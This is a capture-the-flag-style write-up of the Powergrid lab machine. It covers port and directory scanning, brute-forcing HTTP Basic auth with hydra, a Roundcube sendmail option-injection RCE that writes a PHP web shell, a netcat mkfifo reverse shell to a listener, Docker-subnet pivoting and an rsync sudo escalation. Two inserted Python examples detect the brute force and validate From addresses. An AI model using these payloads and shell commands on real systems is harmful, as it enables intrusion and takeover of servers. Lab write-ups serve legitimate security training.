OSCP-PG-Powergrid

Mkd1R, 2022-5-27

#Enumeration

-nmap

# nmap -sS -Pn -open -T4 -p- 192.168.226.81
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-26 19:54 CST
Nmap scan report for 192.168.226.81
Host is up (0.31s latency).
Not shown: 64820 closed tcp ports (reset), 712 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT    STATE SERVICE
80/tcp  open  http
143/tcp open  imap
993/tcp open  imaps

-nmap2

# nmap -p80,143,993 -A 192.168.226.81     
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-26 19:55 CST
Nmap scan report for 192.168.226.81
Host is up (0.29s latency).

PORT    STATE SERVICE  VERSION
80/tcp  open  http     Apache httpd 2.4.38 ((Debian))
|_http-title: PowerGrid - Turning your lights off unless you pay.
|_http-server-header: Apache/2.4.38 (Debian)
143/tcp open  imap     Dovecot imapd
|_imap-capabilities: more have LOGIN-REFERRALS capabilities listed ENABLE LITERAL+ Pre-login post-login OK ID IDLE STARTTLS SASL-IR LOGINDISABLEDA0001 IMAP4rev1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=powergrid
| Subject Alternative Name: DNS:powergrid
| Not valid before: 2020-05-19T16:49:55
|_Not valid after:  2030-05-17T16:49:55
993/tcp open  ssl/imap Dovecot imapd
|_imap-capabilities: more LOGIN-REFERRALS have AUTH=PLAINA0001 ENABLE LITERAL+ Pre-login post-login capabilities ID OK listed SASL-IR IDLE IMAP4rev1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=powergrid
| Subject Alternative Name: DNS:powergrid
| Not valid before: 2020-05-19T16:49:55
|_Not valid after:  2030-05-17T16:49:55
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: VoIP adapter|general purpose
Running: Cisco embedded, Linux 2.6.X
OS CPE: cpe:/h:cisco:unified_call_manager cpe:/o:linux:linux_kernel:2.6.26
OS details: Cisco Unified Communications Manager VoIP adapter, Linux 2.6.26 (PCLinuxOS)
Network Distance: 2 hops

TRACEROUTE (using port 993/tcp)
HOP RTT       ADDRESS
1   306.30 ms 192.168.49.1
2   306.51 ms 192.168.226.81

#Web Enumeration

-Gobuster

# gobuster dir -u http://192.168.226.81 -t 50 -w /usr/share/wordlists/dirb/big.txt -x php,html,txt,json -o gbig2.txt
===============================================================
/images               (Status: 301) [Size: 317] [--> http://192.168.226.81/images/]
/index.php            (Status: 200) [Size: 3646]                                   
/server-status        (Status: 403) [Size: 279]                                    
/zmail                (Status: 401) [Size: 461]
Visiting the main page on port 80 (http://192.168.226.81/), there are three usernames at the bottom of the page worth noting: deez1, p48, all2.
Apart from an images page and a 401 authentication page there is nothing else, so in the end I decided to brute-force the 401 page with these usernames and the rockyou wordlist that ships with Kali.
GET /zmail HTTP/1.1
Host: 192.168.226.81
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Authorization: Basic ZGVlejE6MTIzNDU2

The request above shows that the Authorization header is base64; decoding it gives the username and password separated by a colon. I used hydra to brute-force it and successfully recovered the password of the p48 user:
hydra -l p48 -P /usr/share/wordlists/rockyou.txt -f 192.168.81.81 http-get /zmail

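A detection-side counterpart to the Basic-auth brute force above, added here as an example and not part of the original post: a sliding-window check over a few constructed Apache access-log lines (the source IP, usernames and timestamps are made up) that flags a client piling up 401s on /zmail and then receiving a 200.

```python
import re
from collections import defaultdict
from datetime import datetime
# Apache combined-log prefix: ip, ident, auth user, timestamp, request, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample lines (IPs, users and times are made up for the example).
SAMPLE_LOG = """\
192.168.49.81 - deez1 [26/May/2022:20:01:00 +0800] "GET /zmail HTTP/1.1" 401 461
192.168.49.81 - deez1 [26/May/2022:20:01:00 +0800] "GET /zmail HTTP/1.1" 401 461
192.168.49.81 - p48 [26/May/2022:20:01:01 +0800] "GET /zmail HTTP/1.1" 401 461
192.168.49.81 - p48 [26/May/2022:20:01:01 +0800] "GET /zmail HTTP/1.1" 401 461
192.168.49.81 - p48 [26/May/2022:20:01:02 +0800] "GET /zmail HTTP/1.1" 401 461
192.168.49.81 - p48 [26/May/2022:20:01:02 +0800] "GET /zmail HTTP/1.1" 200 3120
10.0.0.7 - - [26/May/2022:20:05:00 +0800] "GET /index.php HTTP/1.1" 200 3646
10.0.0.7 - - [26/May/2022:20:05:03 +0800] "GET /zmail HTTP/1.1" 401 461
"""

def find_basic_auth_bruteforce(log_text, path_prefix="/zmail",
                               threshold=5, window_seconds=60):
    """Map ip -> (total_401s, usernames_tried, success_after_burst) for sources
    with >= threshold 401s on path_prefix inside one window of window_seconds."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not m["path"].startswith(path_prefix):
            continue
        ts = datetime.strptime(m["ts"], TS_FMT)
        events[m["ip"]].append((ts, int(m["status"]), m["user"]))
    hits = {}
    for ip, evs in events.items():
        evs.sort()
        fails = [(t, u) for t, s, u in evs if s == 401]
        # Largest number of failures that fit in one sliding window.
        start, best = 0, 0
        for end in range(len(fails)):
            while (fails[end][0] - fails[start][0]).total_seconds() > window_seconds:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            users = sorted({u for _, u in fails if u != "-"})
            last_fail = fails[-1][0]
            # A 200 at or after the last failure is a probable successful guess.
            success = any(s == 200 and t >= last_fail for t, s, _ in evs)
            hits[ip] = (len(fails), users, success)
    return hits
```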
After logging in, another login screen appeared, but the same account and password logged in successfully. Inside there is an email from root; its content includes a paragraph of text and a PGP-Encrypted Message. I also noted the version.

#Exploitation

This version has an RCE vulnerability; I tried exploiting it and succeeded (https://www.exploit-db.com/exploits/40892). I modified the _from parameter and the _subject parameter in the data to write a phpinfo for testing:
POST /zmail/?_task=mail&_unlock=loading1653637099991&_lang=en_US&_framed=1 HTTP/1.1
Host: 192.168.81.81
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 290
Origin: http://192.168.81.81
Authorization: Basic cDQ4OmVsZWN0cmljbw==
Connection: close
Referer: http://192.168.81.81/zmail/?_task=mail&_action=compose&_id=52809309962907fc534c57
Cookie: roundcube_sessid=jl61m9rr76vhcom7i67e0fsesv; language=en_US; roundcube_sessauth=Nhw4V30Gi3mwgG8Egub4BTaiHs-1653636900
Upgrade-Insecure-Requests: 1

_token=zrRqGx8U8KZrxDePgF6KPCjgv3pQWKuN&_task=mail&_action=send&_id=52809309962907fc534c57&_attachments=&_from=example@example.com -OQueueDirectory=/tmp -X/var/www/html/shell2.php&_to=test%40test.com&_cc=&_bcc=&_replyto=&_followupto=&_subject=<?php system($_REQUEST['a']);?>&editorSelector=plain&_priority=0&_store_target=Sent&_draft_saveid=&_draft=&_is_html=0&_framed=1&_message=test
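The defensive counterpart to the option injection in the _from parameter above, added here as an example and not Roundcube's own code: a From-address check that rejects the whitespace and leading-dash shapes the injection relies on, shown beside the unsafe shell-splice it replaces. INJECTED_FROM and CLEAN_FROM are constructed values.

```python
import re

# Constructed values: the injected string mirrors the shape of the _from
# parameter above; the clean one is a made-up address on the host's cert CN.
INJECTED_FROM = "example@example.com -OQueueDirectory=/tmp -X/var/www/html/shell2.php"
CLEAN_FROM = "p48@powergrid"

# Deliberately narrow address grammar: exactly one '@', no whitespace, no quotes.
ADDR_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+")

def from_address_is_safe(from_addr):
    """True only if the value is a single bare address that cannot be read
    as one or more sendmail options (no whitespace, no leading '-')."""
    return bool(ADDR_RE.fullmatch(from_addr)) and not from_addr.startswith("-")

def injection_indicators(from_addr):
    """Tokens a WAF or log rule would key on: whitespace-separated words
    starting with '-' inside what should be a single e-mail address."""
    return [tok for tok in from_addr.split() if tok.startswith("-")]

def vulnerable_sendmail_cmd(from_addr):
    """Pre-fix shape: the address is spliced into a shell command string, so
    embedded '-O'/'-X' words become real sendmail options."""
    return f"/usr/sbin/sendmail -t -i -f {from_addr}"

def hardened_sendmail_argv(from_addr):
    """Hardened shape: validate first, then hand the address to subprocess as
    a single argv element with no shell involved."""
    if not from_address_is_safe(from_addr):
        raise ValueError(f"rejected From address: {from_addr!r}")
    return ["/usr/sbin/sendmail", "-t", "-i", "-f", from_addr]
```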
After the test succeeded, I tried to get a reverse shell, listening on local port 2222:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.49.81 2222 >/tmp/f
URL-encoded:
%72%6d%20%2f%74%6d%70%2f%66%3b%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%66%3b%63%61%74%20%2f%74%6d%70%2f%66%7c%73%68%20%2d%69%20%32%3e%26%31%7c%6e%63%20%31%39%32%2e%31%36%38%2e%34%39%2e%38%31%20%32%32%32%32%20%3e%2f%74%6d%70%2f%66
Then the shell came back successfully.
After getting www-data, I used su to switch to the p48 user with the same password cracked earlier, electrico. In the home directory I also found a privkey.gpg file; together with the PGP-Encrypted Message from earlier it can be decrypted, using electrico as the passphrase. The decrypted result is an SSH private key, but port 22 is not open on the host itself, so I went back and re-read the hint, which says to scan IPs and use the encrypted SSH key below.
I ran the ip a command and saw a docker0 interface, so I scanned for live IPs:
for i in {1..254}; do ping -c 1 -W 1 172.17.0.$i &>/dev/null && echo "172.17.0.$i is alive" || echo "172.17.0.$i is down"; done
172.16.0.2 was found alive, so I tried the three users found earlier in turn and finally found that p48 could log in.
I first ran sudo -l to see what privileges the current user has and found that rsync could be run with NOPASSWD, so I looked up rsync privilege-escalation methods and escalated successfully:
sudo rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
I thought I already had the highest privileges, but I could not find proof.txt; I only saw flag3.txt, which hinted me to turn around. So I tried to ssh back to 172.17.0.1, and this time I found proof.txt.
- THE END -

Mkd1R

July 2, 21:58

Last modified: July 2, 2022